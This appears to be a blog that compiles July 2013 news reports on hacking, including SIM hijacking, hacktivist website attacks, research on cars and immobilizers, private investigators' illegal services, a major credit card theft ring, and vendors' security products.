Wednesday 31 July 2013

Hacking episode embarrassed me: Radhika

BANGALORE: "Unfortunate and very embarrassing." This is how Sandalwood actor Radhika Pandit described the situation she faced after a 20-year-old college dropout allegedly hacked into her SIM card and sent messages to her contacts from her number. The youth was arrested on Sunday.
Radhika said, "It was invasion of one's personal life and not a nice feeling at all. I came to know that the arrested person had sent messages to producers and actors seeking photos and information about other artistes. Since many people trust me in Sandalwood, they were giving the information that he wanted. I agree, it is common for celebrities to face this kind of situation, but my reputation has been damaged by the incident."
Being a celebrity is not just about glamour, it has its pitfalls too and one has to deal with them, says Radhika. So will the actor keep her new number a secret? "No. Today's technology makes it easy to get the numbers of others. I can perhaps apply a little more caution.''
Radhika said she still wonders how her cell phone worked even after a complaint was given to the service provider for blocking her number. "I just want to know how it happened. I think the service providers should be cautious while dealing with complaints like mine. This type of incident can happen to anyone."

Siberian man faces jail, accused of hacking Kremlin website

A Krasnoyarsk man faces up to four years jail for allegedly blocking President Vladimir Putin's website for one hour.
A file on the 30-year-old has been passed to a court in the city, a regional FSB secret services source told Rossiyskaya Gazeta. He was acting in support of the so-called 'March of the Millions' by opposition activists last May, it was reported.
The man - who was not named - denies intentionally downing the Kremlin.ru website, said the newspaper.
'He is not pleading guilty, saying to the investigation that he was not aware that this programme was a malware and might block the website. But the investigation found that the defendant consciously used the hacking programme,' said the FSB source.
At the time reports said that the attack on the president's site on May 9, two days after Putin was inaugurated for the third time, was by hacker activist group Anonymous.
On an opposition Twitter account a message was posted declaring: 'Anonymous shuts down Kremlin's websites'.
Internet users in Russia said they were unable to access the Kremlin website for up to an hour before counter-measures were taken.
The attack was predicted in advance. It was not previously known that the hacking attack originated in Siberia. The criminal case was opened under part one of clause 273 of Russia's Criminal Code - 'Manufacturing, using and distributing of computer's malware'.
'All the relevant departments are taking the necessary measures to counteract attacks', said a spokesman for the Kremlin Internet security division at the time. 'This is routine work. There is always some external influence. Today we are witnessing a splash of activity (by the attackers).'
However they had 'failed to achieve their goal' of downing the site for any length of time, he said.

Volkswagen halts disclosure of hacking secrets

LONDON — A British university is delaying the release of an academic paper on how the antitheft systems of millions of Volkswagen vehicles are at risk of being hacked after the German carmaker took legal action against it.
In a statement, the University of Birmingham said it would defer publication of the paper — which explains how researchers were able to subvert Volkswagen's security system — after an interim injunction issued by England's High Court. It said it was "disappointed with the judgment which did not uphold the defense of academic freedom and public interest, but respects the decision."
The university did not elaborate on how long the paper would be held, saying it was still getting legal advice.
The paper — which a group of academics had planned to publish next month — revealed three ways to bypass a brand of computer chip used by several auto manufacturers to fight vehicle theft.
Often referred to as immobilizers, such chips use a secret algorithm to ensure that a car can only be started with the right key, and they've been mandatory in all new vehicles sold in Britain over the past 15 years.
Crucially, the researchers planned to reveal how they were able to reverse-engineer the algorithm — and publish a copy of it in their paper.
Volkswagen said that publishing the formula would be highly damaging and facilitate the theft of cars, according to a ruling handed down last month by High Court Justice Colin Birss. The judge said that millions of Volkswagen vehicles were issued with the chip, including high-end cars such as Porsches, Audis, Bentleys, and Lamborghinis.
The researchers countered that Volkswagen's claim that the paper would be a boon to car thieves was overblown, that they had warned the chip's manufacturer about the vulnerability six months ago, and that a gag order would interfere with their legitimate academic work.
Birss said he sympathized with the researchers' rights, but had to weigh them against public safety.
"I recognize the high value of academic free speech, but there is another high value, the security of millions of Volkswagen cars," he said.
It's not yet clear if the case will go to trial. The University of Birmingham declined further comment today. Volkswagen also declined comment, citing ongoing proceedings.

Hacking: Keith Vaz says firms linked to rogue investigators may not be named

Keith Vaz, who has been leading an inquiry into private investigators suspected of hacking and other illegal practices. Photograph: Linda Nylind for the Guardian
The names of law firms, insurance companies and others linked to rogue private investigators suspected of hacking and other alleged illegal practices may not be released because they could compromise a police investigation, the chairman of the Commons home affairs select committee has said.
Keith Vaz, who has been spearheading an inquiry into private investigators' practices, told Radio 4's Today programme he wanted to reveal the names of the organisations on the list and could do so using parliamentary privilege, but had been told by the information commissioner and the Metropolitan police that they could be interested in investigating the 94 businesses and individuals on the list compiled by the Serious Organised Crime Agency (Soca).
The identities of the firms involved have not yet been revealed, although Vaz's committee has released a breakdown of the sectors they work in, including law, oil, rail services and the security industry.
Twenty-two law firms used private investigators convicted of illegally obtaining information, MPs have said.
Others on the list include celebrities, eight financial services firms and 10 insurance companies.
Vaz told BBC Radio 4's Today programme: "I don't think that parliament should be part of a 'secret squirrel' club where we are given a list that is important and should be in the public interest and we are not able to publish it.
"The reason that we can't publish it at the moment – though I am consulting with members of the committee and we will come to a view on this – is because we are told that both the information commissioner and the Metropolitan police may be interested in investigating the 94 companies, firms, individuals that are on the second list."
A final decision on whether to release the names would be taken when the committee published its report, he said.
"The deadline, if you like, is when we publish our report into private investigators, we would like to be in a position where we publish the entire list. But we don't want to compromise any investigation that the Metropolitan police may or may not be involved in."
Vaz said Soca and the police would appear before the committee on 3 September to update members on progress. "We want to be responsible," he added.
Controversy over Soca's refusal to name the rogue operators' clients has grown in the past few weeks as it emerged that blue-chip companies may have inadvertently used investigators who used illegal techniques.
There have been calls for the firms to be named and investigated in the same way as the News of the World executives and journalists were following the phone-hacking scandal.
The list suggested that private investigators often subcontracted work to each other – 16 clients were other private investigation agencies.
It was put to Vaz that the police could keep the committee "stringing along forever", and he said: "That is the balance. This list has been around for a number of years and nobody has done anything about it."
He added: "Frankly, what it just needs is somebody to go along to the 94. This can be cleared up quite quickly. You should ask the firms involved did they know that the rogue investigators were getting illegal information, were they acting illegally? If yes, then you have to consider criminal liability. If no, then you cross them off. These companies, individuals and firms don't even know they are on this list."
Vaz added: "The real root of all this, of course, is we need to regulate about private investigators. We recommended this a year ago, it's not happened and hopefully the government will finally join the debate by doing something about it."

Tuesday 30 July 2013

£7,000 to hack a phone or bug a computer: Private investigators have detailed price list of illegal services

  • Bank details for £2,000 and phone bills for £450 also on 'menu' of services
  • PIs could also use viruses to steal data, including what tax people pay
  • Their illicit services were used by law firms, insurers and wealthy individuals
Criminal private investigators charged firms up to £7,000 to hack a phone, according to a secret document leaked yesterday. They offered to hack, blag and steal sensitive personal information in a detailed price list of illegal services, a police intelligence report found. Among those fuelling the underworld trade were information-hungry law firms, insurers, financiers and wealthy individuals. The Serious Organised Crime Agency (Soca) found intercepting telephone conversations came with a bill of up to £7,000.
    Yours for £7,000: Private eyes could eavesdrop on conversations for a cash sum, according to Soca. File picture
    And private eyes charged the same amount to use computer viruses to steal data from the hard-drives of targets.
    Personal bank details could be obtained for £2,000 and one month of itemised phone billing cost £450.
    Other services, including getting customer details from utility companies and finding out how much tax people pay, could be purchased for as little as £100.
    The price list was compiled in a 2008 report by Soca officials who were deeply concerned at the increasing threat of dodgy private eyes. Yesterday, an uncensored version released on the internet for the first time outlined how private investigators targeted almost every source of official information.
    An itemised phone bill for a month would set clients back £450. File picture
    Among the public institutions to come under attack were HM Revenue and Customs, the Department of Work and Pensions, the NHS and local authorities.
    Other private companies included high street banks, British Gas, British Telecom and mobile phone companies. Rogue private investigators outsourced work to specialist ‘blaggers’ who posed as customers and colleagues to access private information. Using untraceable mobile phones, they often referred to scripts and hints recorded in a document that became known as ‘The Blagger’s Manual’. The incriminating ‘how to’ book of crime was found by police when they raided the offices of one private investigator operating in the London suburbs.
    The Soca report, which was previously released in a censored form, was based on the results of five criminal investigations. Among them was Operation Caryatid, Scotland Yard's original investigation into phone hacking at the News of the World. They found five groups of people were using private investigators to obtain information that they could not get their hands on legitimately. They were those involved in messy divorces, debt collectors trying to find people, insurers investigating claims, criminals who want to frustrate the police, and the media.
    One of the most prolific private eyes has since come forward to claim that 80% of his clients were not linked to the media. The leak came as pressure continues to pile on Soca and police to name those who may have used criminal private eyes.
    MPs, including Keith Vaz, want to find ways of publishing the list
    More than 300 companies and individuals may have been identified by police investigating so-called ‘blue chip’ hacking. A list of 102 names has been passed to the Home Affairs Select Committee by Soca on the agreement that they will not be published. So far no-one has been named publicly or prosecuted despite clear evidence that the activities of their snoopers broke the law. Keith Vaz MP, who chairs the Home Affairs Committee, has written to a string of regulators to ask what guidelines are enforced on the use of private eyes. MPs are concerned that some companies may have turned a blind eye to how they obtained the information because they were desperate for results. Home Secretary Theresa May is expected to announce proposals that will require private detectives to have a licence to operate.
    Anyone found guilty of hacking, blagging or other similar offences will be barred from working in the field.
    A spokesman for HM Revenue and Customs said it takes expert technical advice to help protect the mass of information it stores.
    He said: ‘We take the protection of customer data extremely seriously so we constantly review our processes and procedures in light of developments.’ A BT spokesman said staff take their responsibility to protect customers ‘very seriously’ and ‘will not tolerate’ misuse of its databases. A Home Office spokeswoman said: ‘We expect law enforcement agencies to take tough action against criminal behaviour wherever it is identified.’

    What's Your Favorite Life Hack for Technology?

    Because smart people who are good at solving problems with DIY methods or life hacks also happen to be very good at the Internet and because people who are good at the Internet also happen to be very good at finding DIY methods or life hacks to solve problems, it seems like we've come to a point where we already know how to solve all of technology's minor annoyances with simple DIY hacks.
    Like come on, who hasn't figured out ways (or at least saved ways to a folder on their desktop called Hacks) to fix messy cables and power cords with binder clips, bread tabs and/or ribbons or something. And seriously, we all know by now that binder clips are the most versatile tool in a life hacker's arsenal, right? Cardboard toilet paper rolls are a solid second place though.
    Did you hear about the one where you tie extension cords together to prevent them from unplugging? Or the accidental genius who put rubber bands on a power adapter? And what about pen springs to extend the life of your cables! There are just so many little fixes out there that blew our minds once upon a time but are just recycled over and over now. And that's fine! We didn't all know the world was round at one point. Or something like that. Whatever.
    What's your favorite life hack for technology? Is it one of the nine BuzzFeed cited in the video above or is it something even better? Or maybe it's one of the 40 tricks we featured last year? Or maybe you just like seeing life hacks more than actually using life hacks.

    Dotcom says Anonymous protest hack of NZ govt websites will backfire

    Hackers disabled several websites of New Zealand's ruling party to protest a new law that would enable the country’s spy agency to snoop on its citizens. Kim Dotcom said hacking the sites only gave PM John Key “a new excuse to pass the GCSB bill”.
    Dotcom, the MegaUpload founder who was the victim of Government Communications Security Bureau (GCSB) snooping last year, is among those outraged by the New Zealand bill. However, the internet mogul said on Twitter that hacking National Party websites would only make things worse.

    The bill was actually prompted by disclosures that the Bureau had illegally spied on Dotcom, who is fighting attempts by the US government to extradite him on charges of Internet piracy, copyright infringement, and money laundering.

    On July 28 hacktivist group Anonymous uploaded a video on YouTube claiming responsibility for the hacking of fourteen websites, including those for Prime Minister John Key and Finance Minister Bill English. The attack was prompted by Key’s refusal to listen to protests against the “despicable piece of legislation”.

    “This new law allows to spy on New Zealanders without a warrant. We strongly condemn this bill,” the video message explained. “John Key, do you think you can pass a new law without a majority of New Zealanders behind it?”

    A screenshot from gerrybrownlee.com
    The websites of the Prime Minister and Finance Minister were restored after being attacked around midnight. The website of the Deputy Leader of the National Party Gerry Brownlee is still disabled.

    The surveillance bill, which is expected to be passed in parliament, would give the GCSB carte blanche to listen in on citizens’ phone conversations. As things stand now, it spies on foreign targets via electronic listening posts but is not allowed to spy on New Zealand citizens or residents.

    The law has been slammed by Internet and civil rights groups, prompting street protests over the weekend. Thousands of people turned out in eleven cities and towns across New Zealand in what was dubbed as an “uphill battle” to stop the bill from coming into effect.

    “It has come to our attention that the thousands that have marched against this bill has still not been enough to send John Key and Peter Dunne a message,” Anonymous said in the video message.

    “John Key make no mistake the majority of New Zealanders oppose this bill. Due to your own arrogance and your unwillingness to listen to the people we have decided to take direct action.”


    Anonymous promised that the websites would remain offline until the National Party patched its web servers or withdrew the bill and apologized to those it had affected, including Kim Dotcom.

    Last January New Zealand police stormed Dotcom’s mansion, seizing assets and digital material. A judge later condemned the raid as illegal and ordered law enforcement to return seized items that were not directly linked to the case against Dotcom. The judge’s decision also led to an official apology from Key to Dotcom, who alleged that the GCSB collaborated with the US government in a bid to comply with the extradition order issued by Washington.

    Monday 29 July 2013

    Been hacked? Don't dial 999: The plods are too dense, sniffs sec bigwig
    'The problem is too big for the authorities to handle'

    Police are powerless to stop super-smart criminals from hacking the world's biggest companies, a top-ranking security bod has warned.
    Juniper Networks' security chief said there was simply no longer any point in calling the police when hackers and DDoSers came to call, because the cops can't do anything. He wants to see a world where big firms share information about potential targets and stop them before any damage can be done.
    Henrik Davidson, the firm's director of security, said: "The problem is too big for the authorities to handle, playing into the hands of the cyber criminals. Additionally there are complications with the global complexity that hacking presents. Who is responsible if a hacker based in Asia attacks a European company? We’ve simply reached a stage where the IT security industry needs to be able to protect itself."
    Davidson made the comments while telling El Reg about Juniper's new "next generation data centre security" system, which now incorporates anti-DDoS defence systems. We visited Juniper's Dutch testing lab, where the firm shows off its latest data centre and networking technology.
    Amsterdam is, of course, famous for two things - and neither were on offer at Juniper Networks' Dutch outpost. Instead the big data shifting bods wanted to show off their sexy racks, although not in the way that most visitors to the city would understand.
    Money is not discussed in the Juniper Proof of Concept lab, where customers - and the nerdier type of journalist - come to coo over various bits of data centre gubbins. Which is just as well, because with prices stretching into the tens of thousands of euros, this is not a place for the casual shopper.
    Juniper told us their new data centre security system offers a four-pronged manner of repelling hackers and DDoS assaults.
    The system allows companies to collect the "fingerprints" of individual hackers, by building up a picture of the attacker based on 200 characteristics, including browser settings, time zone and even fonts. This allows for the blocking of individual devices, a more sophisticated form of defence than simple IP blocking.
    The newest part of this system is called DDoS Secure, which Juniper claims is capable not only of repelling traditional large-scale DDoS attacks, but also the newer “low and slow” attacks, which use slow, small-scale traffic to bypass security and bring down servers.
    DDoS Secure monitors incoming and outgoing traffic, learning which IP addresses and devices can be trusted. It can detect unusual activity from a user and then respond by blocking them.
    Whenever a threat at one port or other vulnerable point is identified, its details are immediately sent to other access points in order to make sure the attacker is repelled.
    Juniper claimed its "Active Defence" system not only worked by fending off attacks, but by identifying threats and stopping them.
    Davidson added: "Active Defence allows you to identify the bad guys before they attack. If you know who the bad guys are, and where they are coming from, you can make life difficult for your attackers if they try and break your defences.
    "Attackers can be identified by a deception point, of which there are thousands. This allows you to identify the characteristics of their device, what fonts they use, what patches they have installed and their IP address, among others. With that you can push a digital fingerprint to the cloud and share the details with partners and other vendors to ensure that more organisations do not face the same threat."
    According to a Juniper survey of 4,771 IT execs worldwide, 60 per cent said their systems had been attacked in the past 12 months. But the same percentage of execs were unhappy with their current defence systems, including next-generation firewalls and IP blocking.
    "For 40 anti-virus systems, there is only a 5% catch rate," Davidson continued. "According to William Fallon’s book The Cyber-readiness Reality Check the number of organisations under attack is close to 100%. More than a third of cyber security execs at companies with revenues greater than $100 million are unable to see an attack once it finds its way into the perimeter of their system. It’s like leaving your front door wide open when there is a burglar in the neighbourhood.
    "Traditional security methods just aren’t passing the test and companies don’t stand a chance as cyber-crime becomes increasingly sophisticated and more frequent."
    Juniper's bosses stepped down on Wednesday in happy circumstances, with the firm's profits and sales both up.

    FACTBOX - Hacking talks that got axed


    REUTERS - Hacking experts and product manufacturers have sometimes been at odds over whether the disclosure of security vulnerabilities is helpful, or harmful, to the public interest.
    Lawsuits, or even the threat of legal action, have resulted in the cancellation of some hacking presentations in recent years. Here are some examples, ahead of this week's Black Hat and Def Con hacking conferences in Las Vegas:
    2005 - Cisco Systems Inc (CSCO.O) persuaded security firm Internet Security Systems to pull a discussion on hacking routers by researcher Michael Lynn at the Black Hat annual hacking conference in Las Vegas.
    On the eve of the conference, Black Hat organizers had workers tear out Lynn's presentation materials from a printed handbook given out to thousands of attendees. Lynn gave the talk anyway, was fired by ISS, and an injunction was obtained to block further public discussion.
    2007 - Security firm IOActive Inc pulled a talk that researcher Chris Paget was due to present at Black Hat DC on bugs in radio-frequency identification, or RFID, technology, saying it was pressured to do so by RFID technology firm HID Global Corp.
    2008 - Three MIT undergrads canceled a Def Con talk in Las Vegas on hacking the "Charlie Card" payment cards for Boston's subway system after an injunction by a U.S. federal court. A judge later rescinded the order, allowing them to go public.
    2013 - Three European computer scientists canceled a talk on hacking the locks of luxury cars at a prestigious U.S. academic conference to be held in August, after Volkswagen AG (VOWG_p.DE) obtained a restraining order from a British court.
    Their paper, which was titled "Dismantling Megamos Crypto: Wirelessly Lockpicking a Vehicle Immobilizer," identified ways to hack into the lock systems of luxury cars including Porsches, Audis, Bentleys and Lamborghinis.

    DARPA-Funded Hackers Gain Control Of Toyota Prius, Ford Escape

    redOrbit Staff & Wire Reports – Your Universe Online

    Two computer hackers who have successfully managed to hack into and manipulate a pair of widely-owned automobiles will present their findings at the Def Con hacking conference in Las Vegas this week, various media outlets are reporting.
    According to FoxNews.com, veteran hackers Charlie Miller and Chris Valasek have discovered a way to remotely force a 2010 Toyota Prius to stop suddenly at high speeds or accelerate without the driver’s foot even being on the gas pedal. Likewise, they claim to be able to disable the brakes of a 2010 Ford Escape at “very low speeds.”
    The two “white hats” (the name given to hackers who try to detect software vulnerabilities before criminals can exploit them) received funding from the US Defense Advanced Research Projects Agency (DARPA) for their research, according to the International Business Times.
    Miller, a security engineer at Twitter, and Valasek, director of security intelligence for Seattle-based IOActive, were tasked by government officials to find out how vulnerable cars could be to computer hacks. They will publish blueprints of the techniques they discovered for attacking the two vehicles in a 100-page white paper, as well as all associated software used in their project, during this week’s conference.
    Their findings might sound downright frightening, but Reuters reporter Jim Finkle said that Prius and Escape owners shouldn’t be too concerned just yet. After all, in order to manipulate the cars, the duo had to be seated within the vehicle and use laptops connected directly to each car’s computer network.
    “They will not be providing information on how to hack remotely into a car network, which is what would typically be needed to launch a real-world attack,” Finkle said. Miller and Valasek said that they are releasing the data hoping that their “white hat” colleagues will be able to build upon their efforts and discover additional automotive security flaws that could be corrected.
    “At the moment there are people who are in the know, there are naysayers who don’t believe it’s important, and there are others saying it’s common knowledge but right now there’s not much data out there,” Miller told BBC News Technology Reporter Zoe Kleinman. “We would love for everyone to start having a discussion about this, and for manufacturers to listen and improve the security of cars.”
    So how did they do it? According to Kleinman, they used cables to connect their laptops to the electronic control units (ECUs) of the vehicles via the on-board diagnostics port, which is also used by mechanics to discover problems with the vehicles.
    The ECUs are the part of the computer network responsible for acceleration, braking, steering and several other aspects of the car’s regular operations process. Once Miller and Valasek gained access to it, they were able to write programs that sent instructions to the car network and overrode the drivers’ commands, she added.
    Toyota spokesman John Hanson told reporters that the company was reviewing the duo’s research, calling the hacks “entirely possible” and stating that the manufacturer is “absolutely” taking the findings seriously.
    Conversely, Craig Daitch of Ford said that since the attack was not “performed remotely” but required “highly aggressive direct physical manipulation of one vehicle over an elongated period of time,” it most likely did not pose “a risk to customers at any mass level.”

    IBM unveils software to identify and predict security risk

    IBM announced an integrated security intelligence solution that helps organizations identify key vulnerabilities in real-time.

    QRadar Vulnerability Manager gives security officers a prioritized view across their network, allowing them to fortify their defenses. By aggregating vulnerability information into a single view, security teams can see the results from multiple network, endpoint, database or application scanners where it can be reviewed and managed.


    More than 70,000 security vulnerabilities exist today, with more than a dozen more being reported every day. The rapid expansion of social, mobile and cloud computing can further increase the threat landscape as each new device attached to a network further expands potential vulnerabilities.

    Part of the IBM Security Intelligence Platform, QRadar Vulnerability Manager (QVM) is a software module that combs through security holes to help close them to potential exploits, excluding those hidden behind firewalls, associated with inactive applications or otherwise unreachable from external attacks.

    By activating a license key, this new software can automatically scan the network and perform the analysis helping security teams direct their staff resources.

    “Traditional vulnerability management solutions are fundamentally broken,” said Brendan Hannigan, General Manager, IBM Security Systems. “Vulnerability scanning today lacks network-wide visibility, contextual awareness and real-time scanning. These gaps mean even well-known and preventable vulnerabilities can be lost in an overload of data, leaving organizations exposed to high risks.”

    QRadar Vulnerability Manager helps clients reduce the remediation and mitigation burden by aggregating vulnerability information into a single risk-based view where it can be quickly prioritized. Security teams can see the results from multiple network, endpoint, database or application scanners alongside the latest X-Force Threat Intelligence alerts and incident reports from the National Vulnerability Database. QRadar Vulnerability Manager also includes its own embedded, PCI-certified scanner which can be scheduled to run periodically or triggered based on network events.

    “QRadar Vulnerability Manager is a breakthrough for the IT security industry,” said Murray Benadie, Managing Director, Zenith Systems, an IBM Business Partner. “It can cut a huge list of vulnerabilities in half, if not more. Users will quickly see vulnerabilities on their networks, without trying to mash products together – that is how information falls through the cracks. This is a true game changer.”

    IBM is enhancing its intrusion prevention platform with the introduction of the IBM Security Network Protection XGS 5100. Fully integrated with IBM Security QRadar, the platform now provides ongoing network data feeds to help identify stealthy attacks carried over Secure Sockets Layer (SSL, the security protocol that lets Web sites pass sensitive information in encrypted form), in addition to providing real-time protection from advanced threats and heightened levels of network visibility and control. This enhanced intrusion prevention platform also includes IBM’s virtual patch technology to provide vulnerability protection when a software patch is not yet available.

    NTODefend now more effectively blocks application vulnerabilities

    NT OBJECTives announced that its NTODefend solution now blocks approximately 30% more application vulnerabilities than the previous version. As a result, NTODefend’s virtual patching solutions now automatically block an average of 95% of an application’s vulnerabilities when used with intrusion detection and prevention technology based on Snort, such as Sourcefire’s Next Gen IPS, or with ModSecurity’s WAF.

    “Few enterprise security teams actually have time to properly train their WAFs to provide the necessary protection, leaving applications and enterprises vulnerable to an ever-changing landscape of threats,” said Dan Kuykendall, co-CEO and CTO of NT OBJECTives. “By strengthening our solution with more accurate rules, we are able to save security teams time, improve the effectiveness of their WAF or IPS, and better protect their web applications from attacks.”

    Most types of web application security software offer virtual patching solutions that merely turn on the default rules packaged with the WAF or IPS; however, in many cases, custom rules are necessary and critical in order to more effectively block discovered vulnerabilities without blocking desirable traffic.

    NTODefend automatically leverages knowledge of the application with information about the vulnerability that instantly creates a custom rule to block the vulnerability. The impact of this custom rule is significant. According to a 2011 study by Larry Suto, web application firewalls become up to 39% more effective in blocking web application vulnerabilities when layered with Dynamic Application Security Testing (DAST) solutions.

    NTODefend enables enterprise security teams to create custom rules to patch their WAF or IPS against vulnerabilities discovered in automated NTOSpider scans. With NTODefend, security professionals are able to patch web application vulnerabilities immediately, expediting the days or weeks it can take to build a custom rule for a WAF or IPS, or the time it takes to deliver a source code patch. This provides developers with the time they need to identify the root cause of the problem and fix it in the code.

    Users simply take the results of their NTOSpider web application security software scan, import them into NTODefend, and generate strong customized rules that target the application’s vulnerabilities, which increases the accuracy of the WAF/IPS and its ability to protect the application. These filters are able to pinpoint vulnerabilities without blocking desirable traffic.

    The improved rules enhancement enables an almost 47% increase in the application vulnerabilities blocked using NTODefend and Sourcefire or ModSecurity.

    Thursday 25 July 2013

    Hacker Ring Stole 160 Million Credit Cards

    U.S. federal authorities have indicted five men – four Russians and a Ukrainian – for allegedly perpetrating many of the biggest cybercrimes of the past decade, including the theft of more than 160 million credit card numbers from major U.S. retailers, banks and card processors.
    The gang is thought to be responsible for the 2007 breach at credit card processor Heartland Payment Systems that exposed some 130 million card numbers, as well as the 2011 breach at Global Payments that involved nearly a million accounts and cost the company almost $100 million.
    Federal prosecutors in New York today called the case the largest hacking scheme ever prosecuted in the U.S. Justice Department officials said the men were part of a gang run by Albert “Soupnazi” Gonzalez, a hacker arrested in 2008 who is currently serving a 20-year-prison sentence for his role in many of the breaches, including the theft of some 90 million credit cards from retailer TJX.
    One of the accused, 27-year-old Dmitriy Smilianets, is in U.S. custody. Vladimir Drinkman, 32, of Syktyvkar, Russia, is awaiting extradition to the United States. Three others named in the indictments remain at large, including Aleksandr Kalinin, 26, of St. Petersburg; 32-year-old Roman Kotov from Moscow; and Mikhail Rytikov, 26, of Odessa, Ukraine.
    According to the government’s indictment, other high-profile heists tied to this gang include compromises at:
    Hannaford Brothers Co: 2007, 4.2 million card numbers
    Carrefour S.A.: 2007, 2 million card numbers
    Commidea Ltd.: 2008, 30 million card numbers
    Euronet: 2010, 2 million card numbers
    Visa, Inc.: 2011, 800,000 card numbers
    Discover Financial Services: 500,000 Diners card numbers
    In addition, the group is being blamed for breaking into and planting malware on the networks of NASDAQ, 7-Eleven, JetBlue, JCPenney, Wet Seal, Dexia, Dow Jones, and Ingenicard.
    The hackers broke into their targets using SQL injection attacks, which take advantage of weak server configurations to inject malicious code into the database behind the public-facing Web server. Once inside, the attackers can upload software and siphon data.
    The government’s indictment alleges that the thieves were at times overwhelmed by the sheer amount of data yielded by their SQL attacks. On Aug. 12, 2007, Kalinin allegedly sent Gonzalez an instant message that he’d just gained access to 30 SQL servers on NASDAQ’s network, but hadn’t yet cracked the administrator passwords that secured the data inside. “These [databases] are hell big and I think most of info is trading histories.” On Jan. 9, 2008, after Gonzalez offered to help attack the trading floor’s computer systems, Kalinin allegedly messaged back, “NASDAQ is owned.”

    Court documents feature an alleged conversation between Kalinin and Gonzalez from March 18, 2008, months after the Hannaford Bros. attack:
    Kalinin: haha they had hannaford issue on tv news?
    Gonzalez: not here
    Gonzalez: I have triggers set on google news for things like “data breach” “credit card fraud” “debit card fraud” “atm fraud” “hackers”
    Gonzalez: I get emailed news articles immediately when they come out, you should do the same, it’s how I find out when my hacks are found :)
    Just a few weeks later, news of a massive credit card breach at Hannaford started trickling out:
    Gonzalez: hannaford lasted 3 months of sales before it was on news, im trying to figure out how much time its going to be alive for
    Gonzalez: hannaford will spend millions to upgrade their security!! lol
    Kalinin: haha
    Kalinin: they would better pay us to not hack them again
    According to prosecutors, the other members of the gang helped harvest data from the compromised systems, and managed the bulletproof hosting services from which the group launched its SQL attacks [the government alleges that Rytikov, for example, was none other than "Abdullah," a well-known BP hosting provider]. The men allegedly sold the credit card data to third parties who routinely purchased them at prices between $10 and $50 apiece. The buyers were given PIN codes and magnetic stripe data that allowed them to create cloned cards for use at retailers and ATMs around the world.

    Wednesday 24 July 2013

    Long-Range RFID Hacking Tool to be Released at Black Hat

    Out of necessity come many interesting inventions.
    Fran Brown, a year ago, was working a penetration test for an electric utility, doing an assessment of its SCADA network. His first challenge was to get inside the facility, meaning, in short, that he had to break in. To do so, he decided to test the utility’s physical security systems, specifically the low-frequency RFID proximity cards used for building access.
    While past research on the problem existed, including Kristin Paget’s groundbreaking 2007 talk at Black Hat DC on RFID cloning, most of the work on the topic included tools that were never released or papers that were largely theoretical. His scouring for information included everything from past talks on the subject, to reading product manuals and even translating some information he found online from a Czech professor.
    Next week at the Black Hat Briefings in Las Vegas, Brown will release the end result: a modified RFID reader that can capture data from 125KHz low frequency RFID badges from up to three feet away. Previous RFID hacking tools must be within centimeters of a victim to work properly; Brown’s tool would allow an attacker or pen-tester to store the device inside a backpack and it would silently grab card data from anyone walking close enough to it.
    “This is the difference between a practical and impractical attack,” said Brown, managing partner at consultancy Bishop Fox. Brown said his attack has been tested numerous times with a 100 percent success rate; he added he’s been able to train other consultants to use the tool and have them capable of doing so within 10 minutes.
    “Hopefully we can start getting ahead of these attacks as they become more applicable,” Brown said, highlighting the example of Disney moving to RFID readers for everything from ticketing, fast passes inside its parks, and souvenir purchases with a Disney-specific credit card. “Every office we tested, whether it was a Fortune 100 customer or government agency, I’ve not come across a system not using one of these legacy readers.”
    The RFID systems have no security, such as encryption, behind them, making it trivial to intercept badge information. An attacker can in theory capture card data, clone it onto a new card, and be able to access a physical facility. Compounding the problem for enterprises is that these readers and badges are often managed by physical security teams and generally operate on a 20-year product lifecycle. For a large company with 100,000 employees, you’re looking at at least that many replacement badges and readers, often in many countries. HID, a leading proximity-card manufacturer, admitted in a June blogpost that its legacy 125KHz cards are vulnerable, yet are still in place in 80 percent of physical access control systems despite the availability of more secure alternatives.
    “There is no security, they’ve been hacked, there’s no protection of data, no privacy, everything is in the clear and it’s not resistant to sniffing or common attacks,” said Stephanie Ardiley, product manager, HID Global.
    Brown’s attack involves the customization of an RFID reader using an Arduino microcontroller to turn it into a long-range reader capable of reading card data from up to 36 inches away, making stealthy approaches possible.
    “This involved the creation of a small, portable [printed circuit board] that can insert into almost any commercial RFID reader to steal badge info and conveniently save it to a text file on a microSD card for later use such as badge cloning,” Brown said.
    Brown said penetration testers will be able to purchase an Arduino microcontroller, install the code he will make available after Black Hat, and replicate his tool and attack.
    “[Hackers] who are seriously motivated can build custom stuff on their own. This is targeted toward the Fortune 500 security professional,” Brown said. “As with any penetration testing tool, this one can be turned malicious. But the way I think of RFID Hacking is that it’s where Web application security was 10 years ago. Until people are doing SQL injection and here’s me stealing with SQL injection, no one is going to be motivated to do anything about it.”
    Brown said he will share some mitigation advice during his talk, including recommendations on which protective sleeves work better at thwarting these types of attacks, and which security screws should be used to secure RFID readers. He will also talk about software-based anomaly detection systems that should be configured to detect people using access cards at odd hours or unusual locations.

    Hawaii cyber range launches anti-hacking training

    The state of Hawaii on Wednesday launched a center to train people to defend computer systems from attack.

    The so-called "cyber range" is a collection of servers and routers in a room on the University of Hawaii's Manoa campus. The equipment will allow people to practice hacking computer systems as a way to learn about network vulnerabilities.
    The machinery will get a workout in early August when the university hosts a training exercise for up to 100 people. Participants will split into a red team of hackers and a blue team responsible for defending a hypothetical business's computer systems.
    "You can really do a good job of fortifying your system but you don't really know how fragile a system is until you try and break it. That's what a cyber range is about," said Brian Chee, the director of the university's Advanced Network Computing Laboratory.
    Most ranges in the country have been built for the military and they are still rare in the civilian world, he said.
    "This is taking the cyberwarfare game and stepping it up a lot," said Chee, whose lab tests equipment for InfoWorld, a network equipment trade magazine.
    Pretending to be a "black hat" or malicious hacker is good practice, he said.
    Chee recounted how he once scanned open wireless network connections while sitting in a downtown Honolulu park between the state's major banks. He found one, and was able to use it to see financial transactions being carried out. He called his friend in the bank's information technology department, who discovered a bank employee had installed an unauthorized Wi-Fi access spot under his desk.
    "They created this big giant puka behind the firewall," he said using the Hawaiian word for hole. "I was actually seeing financial transactions go by. If a black hat decided to take advantage of that, they could wreak havoc."
    The equipment for the cyber range would cost just under $2 million if bought new, Chee estimated. But the state spent only about $1,000 on it because most of it was donated from places like Chee's lab and the Maui High Performance Computing Center, said Franklin Jackson, cyber security executive for the state Department of Defense.
    University officials, private sector workers and the Hawaii National Guard worked together to get the center going.
    Gov. Neil Abercrombie said at a dedication ceremony for the range his administration will follow up during the next legislative session with proposals to invest more in information technology.
